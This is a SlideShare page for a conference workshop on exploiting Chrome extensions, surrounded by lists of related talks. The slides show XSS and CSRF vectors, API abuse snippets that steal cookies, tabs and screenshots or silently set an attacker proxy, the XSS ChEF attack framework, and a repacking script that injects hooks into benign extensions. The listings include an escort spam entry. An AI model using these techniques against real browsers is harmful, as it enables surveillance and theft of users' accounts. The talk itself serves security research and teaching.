Chrome extensions threat analysis and countermeasuresRoel Palmaers
 
Krzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesKrzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesYury Chemerkin
 
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceSomething wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceKrzysztof Kotowicz
 
Protecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersProtecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersFrank Kim
 
Making Chrome Extension with AngularJS
Making Chrome Extension with AngularJSMaking Chrome Extension with AngularJS
Making Chrome Extension with AngularJSBen Lau
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security Headers[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security HeadersOWASP
 
Cross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationCross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationRoberto Suggi Liverani
 
Rails security: above and beyond the defaults
Rails security: above and beyond the defaultsRails security: above and beyond the defaults
Rails security: above and beyond the defaultsMatias Korhonen
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Divyanshu
 
Foxtrot C2: Forced Payload Delivery
Foxtrot C2: Forced Payload DeliveryFoxtrot C2: Forced Payload Delivery
Foxtrot C2: Forced Payload DeliveryDimitry Snezhkov
 
Devopsdays london: Let’s talk about security
Devopsdays london: Let’s talk about securityDevopsdays london: Let’s talk about security
Devopsdays london: Let’s talk about securityJustin Cormack
 
Chrome Apps & Extensions
Chrome Apps & ExtensionsChrome Apps & Extensions
Chrome Apps & ExtensionsVarun Raj
 
Cloudflare and Drupal - fighting bots and traffic peaks
Cloudflare and Drupal - fighting bots and traffic peaksCloudflare and Drupal - fighting bots and traffic peaks
Cloudflare and Drupal - fighting bots and traffic peaksŁukasz Klimek
 
Chrome extension 2014.08.03
Chrome extension 2014.08.03Chrome extension 2014.08.03
Chrome extension 2014.08.03louisasea666
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Krzysztof Kotowicz
 

Similaire à Advanced Chrome extension exploitation (20)

Securing your web application through HTTP headers
Securing your web application through HTTP headersSecuring your web application through HTTP headers
Securing your web application through HTTP headers
 
Chrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasuresChrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasures
 
Krzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesKrzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comes
 
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceSomething wicked this way comes - CONFidence
Something wicked this way comes - CONFidence
 
Protecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersProtecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP Headers
 
Making Chrome Extension with AngularJS
Making Chrome Extension with AngularJSMaking Chrome Extension with AngularJS
Making Chrome Extension with AngularJS
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security Headers[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security Headers
 
Cross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationCross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitation
 
Rails security: above and beyond the defaults
Rails security: above and beyond the defaultsRails security: above and beyond the defaults
Rails security: above and beyond the defaults
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
 
Foxtrot C2: Forced Payload Delivery
Foxtrot C2: Forced Payload DeliveryFoxtrot C2: Forced Payload Delivery
Foxtrot C2: Forced Payload Delivery
 
Devopsdays london: Let’s talk about security
Devopsdays london: Let’s talk about securityDevopsdays london: Let’s talk about security
Devopsdays london: Let’s talk about security
 
Chrome Apps & Extensions
Chrome Apps & ExtensionsChrome Apps & Extensions
Chrome Apps & Extensions
 
Cloudflare and Drupal - fighting bots and traffic peaks
Cloudflare and Drupal - fighting bots and traffic peaksCloudflare and Drupal - fighting bots and traffic peaks
Cloudflare and Drupal - fighting bots and traffic peaks
 
Chrome extension 2014.08.03
Chrome extension 2014.08.03Chrome extension 2014.08.03
Chrome extension 2014.08.03
 
14_526_topic11.ppt
14_526_topic11.ppt14_526_topic11.ppt
14_526_topic11.ppt
 
14_526_topic11.ppt
14_526_topic11.ppt14_526_topic11.ppt
14_526_topic11.ppt
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
 

Plus de Krzysztof Kotowicz

Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)
Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)
Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)Krzysztof Kotowicz
 
Trusted Types and the end of DOM XSS
Trusted Types and the end of DOM XSSTrusted Types and the end of DOM XSS
Trusted Types and the end of DOM XSSKrzysztof Kotowicz
 
I'm in your browser, pwning your stuff
I'm in your browser, pwning your stuffI'm in your browser, pwning your stuff
I'm in your browser, pwning your stuffKrzysztof Kotowicz
 
Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraKrzysztof Kotowicz
 
Html5: something wicked this way comes
Html5: something wicked this way comesHtml5: something wicked this way comes
Html5: something wicked this way comesKrzysztof Kotowicz
 
Creating, obfuscating and analyzing malware JavaScript
Creating, obfuscating and analyzing malware JavaScriptCreating, obfuscating and analyzing malware JavaScript
Creating, obfuscating and analyzing malware JavaScriptKrzysztof Kotowicz
 
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScript
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScriptTworzenie, zaciemnianie i analiza złośliwego kodu JavaScript
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScriptKrzysztof Kotowicz
 
Jak ocalić swoje dane przed SQL injection?
Jak ocalić swoje dane przed SQL injection?Jak ocalić swoje dane przed SQL injection?
Jak ocalić swoje dane przed SQL injection?Krzysztof Kotowicz
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)Krzysztof Kotowicz
 

Plus de Krzysztof Kotowicz (12)

Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)
Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)
Trusted Types - Securing the DOM from the bottom up (JSNation Amsterdam)
 
Trusted Types @ W3C TPAC 2018
Trusted Types @ W3C TPAC 2018Trusted Types @ W3C TPAC 2018
Trusted Types @ W3C TPAC 2018
 
Trusted Types and the end of DOM XSS
Trusted Types and the end of DOM XSSTrusted Types and the end of DOM XSS
Trusted Types and the end of DOM XSS
 
HTML5: Atak i obrona
HTML5: Atak i obronaHTML5: Atak i obrona
HTML5: Atak i obrona
 
I'm in your browser, pwning your stuff
I'm in your browser, pwning your stuffI'm in your browser, pwning your stuff
I'm in your browser, pwning your stuff
 
Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPra
 
Html5: something wicked this way comes
Html5: something wicked this way comesHtml5: something wicked this way comes
Html5: something wicked this way comes
 
Creating, obfuscating and analyzing malware JavaScript
Creating, obfuscating and analyzing malware JavaScriptCreating, obfuscating and analyzing malware JavaScript
Creating, obfuscating and analyzing malware JavaScript
 
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScript
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScriptTworzenie, zaciemnianie i analiza złośliwego kodu JavaScript
Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScript
 
Jak ocalić swoje dane przed SQL injection?
Jak ocalić swoje dane przed SQL injection?Jak ocalić swoje dane przed SQL injection?
Jak ocalić swoje dane przed SQL injection?
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)
Kompletny przewodnik po SQL injection dla developerów PHP (i nie tylko)
 

Dernier

Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 

Dernier (20)

Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 

Advanced Chrome extension exploitation

  • 1. Advanced   Chrome  Extension  Exploita5on Kyle  ‘Kos’  Osborn Krzysztof  Kotowicz 1
  • 2. Introduc5on • Krzysztof  Kotowicz – IT  security  consultant  at  SecuRing – h<p://blog.kotowicz.net – @kkotowicz   • Kyle  Osborn – Pentester  at  AppSec  ConsulFng – h<p://kyleosborn.com/ – @theKos 2
  • 3. Previous  research • Kyle  Osborn,  Ma<  Johansen – Hacking  Google  ChromeOS  (BH  2011) • N.  Carlini,  A.  Porter  Felt,  D.  Wagner  -­‐  UC  Berkeley – An  EvaluaFon  of  the  Google  Chrome  Extension  Security   Architecture h<p://www.eecs.berkeley.edu/~afelt/ extensionvulnerabiliFes.pdf • Krzysztof  Kotowicz – h<p://blog.kotowicz.net/2012/02/intro-­‐to-­‐chrome-­‐addons-­‐ hacking.html 3
  • 4. Plan • Briefing – Chrome  extensions  security  101 – Abusing  Chrome  extensions – Easy  exploitaFon – Using  XSS  ChEF • Workshops – all  of  the  above  in  pracFce  &  more – h<p://kotowicz.net/brucon/ 4
  • 6. Chrome  extensions  security • Extensions  are  HTML5  applicaFons  packaged  in  signed  .crx   files • chrome-­‐extension://<id>  URLs • Have  access  to  powerful  API – chrome.tabs – chrome.history – chrome.cookies – chrome.proxy – bundled  plugins  (NPAPI) • Permissions  defined  in  manifest.json 6
  • 7. Chrome  extensions  security • Extensions  have  a  lot  of  power  to  abuse • How  bad  can  it  be?  Think... – global  XSS – idenFty  thec  (bookmarks,  history,  cookies) – filesystem  access – remote  code  execuFon  (meterpreter) 7
  • 8. Chrome  extensions  security Content  script • Can  interact  with  webpage  DOM – e.g.  execute  Javascript – isolated  worlds  for  page  JS  /  content  script  JS • No  access  to  chrome.*  API 8
  • 9. Chrome  extensions  security View  pages • Have  access  to  chrome.*  API • No  access  to  webpage  DOM • Content  scripts  and  view  pages  can  only   exchange  messages • Examples: – opFon  pages – new  tabs – popups 9
  • 10. Chrome  extensions  security Background  page • View  page  that  runs  constantly • Has  access  to  chrome.*  API • The  UlPmate  Target 10
  • 11. Chrome  extensions  security • Currently,  Chrome  extension  security  is  very   reliant  on  the  developer – WriFng  bad  code  is  easy – Giving  extensions  more  permissions  than   necessary  is  easier • Extensions  suffer  from  common  web   vulnerabili5es 11
  • 12. Chrome  extensions  security • XSS:    page  DOM  has  a  vector  that  is  grabbed   and  executed  by  extension   <link  rel="alternate"  type="application/rss+xml"   title="hello  <img  src=x  onerror='alert(1)'>"   href="/rss.rss"> • CSRF:  Page  directly  requests  extension  URLs <iframe  src="chrome-­‐extension://<id>/pages/ subscribe.html?location=//evil/whitelist"></iframe> 12
  • 13. Chrome  extensions  security • NPAPI  plugins  vulns – Extensions  can  use  NPAPI  plugins  (.dll,  .so  etc.) – Those  run  outside  of  Chrome  sandboxes – Full  permissions  of  current  OS  user – Possible  vulns:  RCE,  buffer  overflows,  path   disclosures,  command  injecFons,  ... • Manual  review  by  Google  if  plugin  is  used 13
  • 14. Chrome  extensions  security • Content-­‐Security-­‐Policy  prevents  XSS • Chrome  supports  CSP  in  the  webpages X-Content-Security-Policy, X-WebKit-CSP • Chrome  supports  CSP  in  extensions content_security_policy  in  manifest • But... 14
  • 15. Extensions  vs  CSP  in  webpage • Total  CSP  bypass – You  can  inject  any  code  via  extension   chrome.tabs.executeScript(null, {code:“alert(1)”}) – Injected  code: • is  same  origin  with  the  page  (document.cookie  etc.) • can  communicate  with  view  pages   (chrome.extension.sendMessage) 15
  • 16. Extensions  vs  CSP  in  manifest • Cannot  execute  arbitrary  code • Even  CSP  in  extension  +  CSP  in  webpage  does   not  make  you  100%  safe! – You  can  pivot  the  a<ack  through  webpage – You  need  addiFonal  vulnerabiliFes  to  exploit  this 16
  • 17. Chrome  extensions  security • Most  commonly  vulnerable – RSS  readers – Note  extensions – Web  Developer  extensions 17
  • 18. Chrome  extensions  security manifest.json • Defines  resources,  permissions,  name  etc. • v1 – insecure,  but  everyone  uses  it • v2 – Secure  Content-­‐Security-­‐Policy  by  default  (no  XSS!) – Pages  cannot  access  extension  URLs  (no  CSRF!) – Unpopular • 26  out  of  top  1000  extensions – Will  be  enforced  in  Q3  2013 18
  • 19. Chrome  extensions  security Installa5on  Methods • Chrome  Web  Store – curated  by  Google • .crx  install  from  any  website  (prompts  user) – Chrome  21  makes  off-­‐store  installs  harder • Drag  &  drop  .crx  to  chrome://extensions • Or  use  --enable-easy-off-store-extension-install  flag • MiTM  not  possible  due  to  cerFficate  signing 19
  • 21. Fingerprin5ng • The  simplest  method – Generate  a  list  of  known  extension  IDs,  and   bruteforce  chrome-­‐extension://ID/  resources  to   discovered  extensions – use  onerror/onload  to  check  for  existence • hZp://blog.kotowicz.net/2012/02/intro-­‐to-­‐ chrome-­‐addons-­‐hacking.html 21
  • 22. CSRF  -­‐  example • Chrome  Adblock  2.5.22 – Extension  UI  uses  pages/subscribe.html   – pages/subscribe.html?locaFon=url  will  subscribe   to  new  block  list var queryparts = parseUri.parseSearch(document.location.search);   BGcall("subscribe",       {id: 'url:' + queryparts.location}); • Can  be  called  by  any  webpage <iframe src="chrome-extension://<id>/pages/ subscribe.html?location=//evil/whitelist"> 22
  • 23. XSS  -­‐  example • Slick  RSS  +  Slick  RSS:  Feed  Finder – simple  injecFon  locaFon  (<link>  tag  Ftle) <link rel="alternate" type="application/rss+xml" title="hello <img src=x onerror='payload'>" href="/rss.rss"> 23
  • 24. Leveraging  XSS • Vector  in  page  =>  XSS  in  content  script – No  access  to  chrome.*  API – Only  chrome.extension.* • e.g.  chrome.extension.connect  &   chrome.extension.sendMessage  to  communicate – Need  to  elevate  to  view  script • From  view  script chrome.extension .getBackgroundPage() .eval(”mwahahahahaaaaa!”) 24
  • 26. NPAPI  vulns  -­‐  example • CR-­‐GPG  0.7.8    (gpg-­‐gmail  bridge) • GPG  in  gmail??? 26
  • 27. NPAPI  vulns  -­‐  example • Uses  external  gpg  install  through  NPAPI  plugin • Long  story  short: – Easy  to  get  from  this: 27
  • 28. NPAPI  vulns  -­‐  example • To  this: 28
  • 29. NPAPI  vulns  -­‐  example • To  this: 29
  • 30. NPAPI  vulns  -­‐  example • To  this: 30
  • 32. Easy  exploita5on • alert(1)  -­‐  Now  what? • Use  an  automated  tool  to  pillage  and  plunder • BeEF  does  a  great  job  hooking  into DOMs • But  –  Need  a  special  tool  designed  to  take   advantage  of  Chrome  extension  APIs 32
  • 33. Easy  exploita5on • Enter  XSS  ChEF (Chrome  Extension  Exploita2on  Framework) – Designed  from  the  ground  up  for   exploiFng  extensions – Fast  (uses  WebSockets) – Preloaded  with  automated a<ack  scripts 33
  • 34. Easy  exploita5on • Monitor  open  tabs  of  vicPms • Execute  JS  on  every  tab • Extract  HTML • Read/write  cookies • Access  localStorage • Manipulate  browser  history • Take  screenshots  of  tabs • Inject  BeEF  hooks  /  keyloggers 34
  • 36. XSS  ChEF Launching  server $ php -v PHP 5.3.12 (cli) (built: Jun 7 2012 22:49:42) Copyright (c) 1997-2012 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2012 Zend Technologies with Xdebug v2.2.0, Copyright (c) 2002-2012, by Derick Rethans $ php server.php 2>command.log XSS ChEF server by Krzysztof Kotowicz - kkotowicz at gmail dot com Usage: php server.php [port=8080] [host=127.0.0.1] Communication is logged to stderr, use php server.php [port] 2>log.txt 2012-07-22 12:40:06 [info] Server created 2012-07-22 12:40:06 ChEF server is listening on 127.0.0.1:8080 2012-07-22 12:40:06 [info] [client 127.0.0.1:60431] Connected 2012-07-22 12:40:06 [info] [client 127.0.0.1:60431] Performing handshake 2012-07-22 12:40:06 [info] [client 127.0.0.1:60431] Handshake sent 2012-07-22 12:40:06 New hook c3590977550 from 127.0.0.1 ... 36
  • 42. API  abuse • chrome.tabs.query  -­‐  gets  access  to  all  tabs   URLs  (even  incognito!),  Ptles,  documents  etc. chrome.tabs.query({}, function(t) { log({type: 'report_tabs','result':t}); }); 42
  • 43. API  abuse • chrome.tabs.executeScript  -­‐  global  XSS  on  any   tab • bypasses  CSP chrome.tabs.executeScript(null, { code:"alert(document.cookie)" }); 43
  • 44. API  abuse • chrome.tabs.captureVisibleTab chrome.tabs.captureVisibleTab(null,null, function(data_url) { log({type:'recvscreenshot', url: data_url}); }); 44
  • 45. API  abuse • chrome.cookies – read/write  cookies,  even  h<pOnly chrome.cookies.getAll({url: chrome.cookies.set({ "https://www.google.com/"}, cb); url: 'https://www.google.com/', name: 'test-chef', value: 'test-ok', {"domain": ".google.com", secure: true, "expirationDate": 1358717774.49, httpOnly: true, "hostOnly": false, expirationDate: null, "httpOnly": true, path: '/' "name": "NID", }, cb); "path": "/", "secure": false, "session": false, "storeId": "0", "value": "61=...." },... 45
  • 46. API  abuse • chrome.proxy  -­‐  silently  change  HTTP  proxy! var evilProxy = { "mode": "fixed_servers", "rules": { "bypassList": ["<local>","ATTACKER_DOMAIN.COM"], // EXCLUDE BACK CHANNEL FROM PROXY "singleProxy": { "host": "localhost", // ATTACKER PROXY IP "port": 8080, // ATTACKER PROXY PORT "scheme": "http" // ATTACKER PROXY SCHEME } } } chrome.proxy.settings.set({value: evilProxy, scope: 'regular'}, cb); 46
  • 47. API  abuse • chrome.bookmarks  -­‐  interact  with  bookmarks chrome.bookmarks.search("http", cb); {"dateAdded": 1342946320, "id": "123", "index": 0, "parentId": "21", "title": "GMail", "url": "https://mail.google.com/"} 47
  • 48. Pre-­‐Workshop  Info • Requirements – Latest  version  of  XSS  ChEF  required  (w/  dependencies) • PHP  5.3  +  HTTP  server,  opFonally  node.js • unzip,  curl   • Only  heavily  tested  under  OS  X  &  Linux – Chrome – Selected  extensions • All  links  can  be  found  on hdp://kotowicz.net/brucon 48
  • 50. Workshop • Part  one:  ExploitaPon – Discovery – AutomaFon • Part  two:  Repacking – Leveraging  the  human  factor 50
  • 51. Part  one:  Exploita5on • Slick  RSS • Slick  RSS:  Feed  Finder 51
  • 52. Part  one:  Exploita5on • Web  Developer 52
  • 53. Part  one:  Exploita5on • Springpad  Extension 53
  • 54. Part  one:  Exploita5on • Cookie  Manager 54
  • 56. Part  Two:  Repacking • Wanted  to  get  MORE  privileges • UPlizes  “click-­‐through-­‐syndrome” • You  can  repack  any  other  benign  extension,   adding  malicious  part  (e.g.  XSS  chef  hook) 56
  • 57. Part  Two:  Repacking $ ./repacker-webstore.sh <ID> output.crx Unpacking ... Injecting xsschef... Adding permissions... Saving... Done. Moving signed extension to output.crx 57